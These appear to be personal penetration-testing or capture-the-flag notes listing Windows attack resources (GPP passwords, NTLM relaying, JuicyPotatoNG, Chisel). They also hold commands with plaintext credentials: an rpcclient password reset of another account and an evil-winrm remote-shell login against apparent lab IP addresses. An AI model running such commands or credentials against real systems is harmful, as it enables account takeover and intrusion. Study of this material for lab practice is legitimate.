Temp - Notes

Exploiting GPP SYSVOL - cname password / Groups.xml

Exploiting GPP SYSVOL (Groups.xml)VK9 Security

Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.pybyt3bl33d3r.github.io

Setting up network between Vbox and VMware

How to Set up Network Between VirtualBox and VMware Virtual MachinesSysprobs

Check Recycle bin

you need the SID for the user that you want to check the recycle bin for.

cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'

Change password for user over rcpclient

Output should be nothing.

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "alien##123"'

EVIL-WINRM for ATHNEA

👾]/home/ali3nw3rx $ sudo docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

runAS

GitHub - antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exeGitHub

Windows Privilege Escalation - Runas (Stored Credentials) - Steflan's Security BlogSteflan's Security Blog

Chisel

Release v1.7.7 · jpillora/chiselGitHub

Juicy PotatoNG

Release JuicyPotatoNG v1.1 · antonioCoco/JuicyPotatoNGGitHub

Windows path traversal cheet sheat